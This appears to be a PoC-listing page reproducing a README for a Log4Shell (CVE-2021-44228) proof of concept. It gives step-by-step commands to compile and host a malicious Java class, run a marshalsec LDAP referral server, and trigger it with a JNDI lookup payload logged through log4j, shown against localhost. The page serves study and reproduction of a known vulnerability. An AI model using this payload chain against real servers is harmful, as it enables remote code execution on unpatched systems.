来源

关联漏洞

描述

POC for Infamous Log4j CVE-2021-44228

介绍

# CVE-2021-44228-Log4Shell-POC
### Complete POC for Infamous Log4j CVE-2021-44228


#### Prerequisites
- Download and Install Java from [here](http://mirrors.rootpei.com/jdk/), you can use jdk-8u181.
- Install IntelliJ Idea from [here](https://www.jetbrains.com/idea/)

#### POC

- Step 1 : Clone this repository.
- Step 2 : Move `Exploit.java` file to a different folder. Like in my case I've created a folder `rce` inside home directory. `/home/coldfusionx/rce`

![mov](images/mov.png)

- Step 3 : Peeking at `Exploit.java`
Here you can change the remote code to anything, in this case this would pop up `gnome-calculator` on a ubuntu machine.

![exp](images/exp.png)

- Step 4 : Next we need to compile `Exploit.java` using command `javac Exploit.java`, once successfully compiled we should see a new file `Exploit.class` gets created.

![com](images/com.png)

- Step 5 : Start a python http server to host `Exploit.class` using `python3 -m http.server 8888`, alternatively you can also use a php server using command `php -S 127.0.0.1:8888`.

![sv](images/sv.png)

- Step 6 : Load the project files into IntelliJ Idea and let maven complete the file indexing.
Once completed your project should look like this :

![poc1](images/poc1.PNG)

- Step 7 : For running the project, we need to create a configuration, click on `Add Configuration` 

![poc2](images/poc2.png)

    1. Select `Application`

![poc3](images/poc3.png)

    2. Select the main class

![main](images/main.png)

    3. Select the JDK and apply.

![poc4](images/poc4.png)

    4. You should see Log4j Applicaton created, ready to run.

![poc5](images/poc5.png)

- Step 8 : Next we start the LDAPRefServer using marshalsec :
- cd `marshasec`
- Run `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"` to start the LDAP server, here `127.0.0.1:8888` is the python server hosting `Exploit.class` hence we specify `/#Exploit`

![ldap](images/ldap.png)

- Step 9 : Edit the JNDI payload in log4j.java as per your requirement, `logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");`
In this case we are loading the remote class `Exploit`, the LDAP referrer server will redirect the request to our python server hosting the malicious `Exploit` class.

- Step 10 : Run `Log4j`, On successful run you should see a gnome calculator pop up.

![rce](images/rce.png)

### Check out my detailed analysis on [Log4Shell CVE-2021-44228](https://blog.qualys.com/vulnerabilities-threat-research/2021/12/15/is-your-web-application-exploitable-by-log4shell-cve-2021-44228-vulnerability)

#### Reference
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228

文件快照

 [4.0K]  /data/pocs/59c27a4f6871d878bcd1d43094b411dbe615a41f
├── [4.0K]  images
│   ├── [ 15K]  com.png
│   ├── [ 86K]  exp.png
│   ├── [ 14K]  ldap.png
│   ├── [ 58K]  main.png
│   ├── [ 31K]  mov.png
│   ├── [188K]  poc1.PNG
│   ├── [ 91K]  poc2.png
│   ├── [ 53K]  poc3.png
│   ├── [ 52K]  poc4.png
│   ├── [ 90K]  poc5.png
│   ├── [255K]  rce.png
│   └── [9.9K]  sv.png
├── [1.0K]  LICENSE
├── [4.0K]  marshalsec
│   └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar
├── [1008]  pom.xml
├── [4.0K]  rce
│   └── [ 266]  Exploit.java
├── [2.6K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [ 432]  log4j.java

6 directories, 18 files

备注